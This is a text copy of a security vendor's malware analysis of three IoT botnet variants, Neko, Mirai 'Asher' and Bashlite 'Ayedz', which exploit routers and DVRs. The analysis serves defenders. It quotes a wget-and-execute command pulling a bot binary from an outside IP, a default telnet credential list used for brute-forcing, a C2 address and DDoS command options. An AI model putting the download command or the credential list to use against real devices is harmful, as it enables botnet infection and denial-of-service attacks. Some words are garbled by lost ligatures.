Neko, Mirai and Bashlite Target Routers, Devices

1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

 Business For Home

Malware Neko, Mirai and Bashlite Target Routers, Devices

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

By: Augusto Remillano II, Jakub Urbanec August 13, 2019 Read time: 6 min (1826 words)



Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

Neko On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 1/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”

Our research indicates that this botnet has versions for various processor architectures.

Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch user datagram protocol or UDP and UPD-HEX ood attacks, inundating a router’s ability to properly process and respond to information.

It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.

Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 2/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

 Eir WAN side remote command injection (TR-064) – a wide area network (WAN) side RCE for Eir D1000 routers

 HNAP SOAPAction-Header Command Execution (CVE-2015-2051) – RCE for multiple D-Link routers caused by an error in handling malicious HTTP requests

 Huawei Router HG532 - Arbitrary Command Execution (CVE-2017-17215) – RCE for the Huawei HG532 router caused by the improper validation of a conguration le

 GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018- 10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection.

 Linksys E-series - Remote Code Execution – RCE caused by an unauthenticated OS command injection

 MVPower Shell Command Execution – exploits an unauthenticated RCE vulnerability in MVPower digital video recorders (DVRs)

 ThinkPHP 5.0.23/5.1.31 RCE – RCE for open-source web development framework ThinkPHP 5.0.23/5.1.31

 Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use Realtek SDK with the miniigd daemon

Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specic exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 3/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Figure 1. Neko botnet code showing how it scans for Africo devices

On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the le is now UPX- packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked.

Figure 2. UPX-packed Neko botnet code with an altered magic number

We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure as the Africo scan.

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 4/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200

The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (2016-6277).

Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV- DVR exploits and Netgear R7000 and R6400 routers

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 5/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.

Figure 6. Neko botnet code showing how it scans for “awsec”

In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”. however, based on our analysis, both commands are unable to successfully exploit any vulnerability. “Cisco” appears to be attempting to use CVE-2018- 15379, wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permission, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited.

Figure 7. Neko botnet code showing how it scans for “cisco”

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 6/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.

Figure 8. Neko botnet code showing how it scans for “wap54g”

Mirai variant “Asher” On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices with a BusyBox, which is a software suite for devices with limited resources. It rst checks for BusyBox presence by executing the "/bin/busybox {any string}" command. If the device’s system responds with " {any string} applet not found," the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 7/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Figure 9. Screenshot showing the command that checks for the presence of a BusyBox

The “Asher” variant can inltrate routers by brute-forcing its way in using the following telnet login credentials:

 12345

 2011vsta

 2601hx

 4321

 admin

 daemon

 default

 guest

 OxhlwSG8

 pass

 password

 root

 S2fGqNFs

 support D13hh[

 synnet

 t0talc0ntr0l4!

 taZz@23495859

 tlJwpbo6

 vizxv

 xc3511

We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 8/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Figure 10. The exploits Asher botnet scans for

 GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018- 10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection.

 MVPower Shell Command Execution – an unauthenticated RCE in MVPower DVR TV-7104HE 1.8.4 115215B9 digital video recorders

 Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use Realtek SDK with the miniigd daemon

Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability

Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 9/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562

Bashlite variant “Ayedz”

On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time, a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s le name. Upon execution, Ayedz will send the following information about the infected device back to the host IP address 167[.]71[.]7[.]231 via port 46216:

Figure 14. The commands used by Bashlite variant Ayedz to send information back to its host

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-… 10/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

 Device – its “getDevice” function returns an “SSH” string if there is a le present in “/usr/sbin/telnetd”, otherwise, it returns with an “Uknown Device” string

 Files – if the device has any of the following les: /usr/bin/python /usr/bin/python3 /usr/bin/perl  Linux distribution or distro – when the infected device’s Linux distro is openSUSE, Red Hat Enterprise Linux (REHL), CentOS, Gentoo Linux, Ubuntu, Debian, or unknown

 Port – its getPorz function returns a “22” string if the four abovementioned les are found; otherwise, it returns with an “Uknown Device” string

Analysis of this Ayedz sample revealed that it is capable of running several backdoor commands for launching DDoS attacks. We also observed that Ayedz features several attack/ood options as well as other commands to its operators, such as:

 CLOUDFLARE - HTTP ood with CloudFlare protection bypass

 CNC - set command and control

 HTTP - HTTP Flood

 RAID - STD + TCP Flood

 STD - STD ood

 STOMP - STD + UDP Flood

 STOP - Stop bot operation

 TCP – TCP SYN ood

 UDP - UDP ood

 UPDATE - downloaded updated binary from C&C

Securing routers against threats like Neko, Mirai, and Bashlite Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats like Mirai, Neko, and Bashlite:

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-… 11/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

 Choosing a reliable manufacturer that consistently patches its products

 Regularly updating the device’s (e.g., routers) rmware and software as well as credentials used to access it

 Encrypting and securing the connections that devices use

 Conguring the router to make them more resistant to intrusions

 Disabling outdated or unnecessary components in devices and using only legitimate applications via trusted sources.

 Deploying tools that provide additional security to home networks and devices connected to them.

Trend Micro solutions Trend Micro Smart Home Network protects customers from the aforementioned exploits through these rules:

1133255 WEB Remote Command Execution in XML -1

WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID- 1059669 37690)

1134287 WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)

1134610 WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561) WEB 1134611 Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561) WEB Dasan 1134891 GPON Routers Command Injection -1.3 (CVE-2018-10561) WEB Dasan GPON 1134892 Routers Command Injection -1.4 (CVE-2018-10561)

EXPLOIT Linksys E-series Unauthenticated Remote Code Execution Exploit 1058632 (EDB-31683) WEB Linksys Unauthenticated Remote Code Execution -1 (OSVDB- 1054456 103321) WEB Linksys Unauthenticated Remote Code Execution -2 (OSVDB- 1054457 103321)

1133498 WEB Remote Command Execution via Shell Script -1.u

1135215 WEB ThinkPHP Remote Code Execution

1134286 WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)

1133498 WEB Remote Command Execution via Shell Script -1.u

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-… 12/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

1134286 WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)

Trend Micro ™ Deep Discovery ™ Inspector protects customers from the mentioned exploits through these rules:

Neko

Payload Rule

Ocial Rule 2547: NETGEAR DGN1000/DGN2200 Remote Code Execution - Netgear HTTP (Request)

Netgear Ocial Rule 4103: Daemon DD-WRT Unauthenticated RCE Exploit - HTTP R7064 (Request)

Crosswe Beta Rule 3268: CCTV-DVR Remote Code Execution – HTTP (Request) b

Ocial Rule 2485: CCTV-DVR Remote Code Execution – HTTP (Request)

Cisco Ocial Rule 2452: Wget Commandline Injection

Beta Rule 3269: CVE-2018-15379 Cisco Prime Infrastructure Remote Command

Execution - HTTP (Request)

Ocial Rule 4168: CVE-2018-15379 Cisco Prime Infrastructure Remote

Command Execution - HTTP (Request)

Awsec/V Ocial Rule 2543: VACRON Remote Code Execution Exploit- HTTP (Request) acron

WAP54G Beta Rule 3270: Linksys Remote Debug Root Shell- HTTP (Request)

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-… 13/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

Ocial Rule 4169: Linksys Remote Debug Root Shell- HTTP (Request)

Asher

REALTEK Rule 2575: Command Injection via UPnP SOAP Interface - HTTP (Request)

Rule 2544: JAWS Remote Code Execution Exploit - HTTP (Request), Rule 2639: JAWS CVE-2018-10562 - GPON Remote Code Execution - HTTP (Request)

Ayedz

Beta Rule 3272: BASHLITE - TCP (Request) - Beta Ocial Rule 4180: BASHLITE Linux - TCP (Request)

The indicators of compromise (IoCs) are listed in an appendix.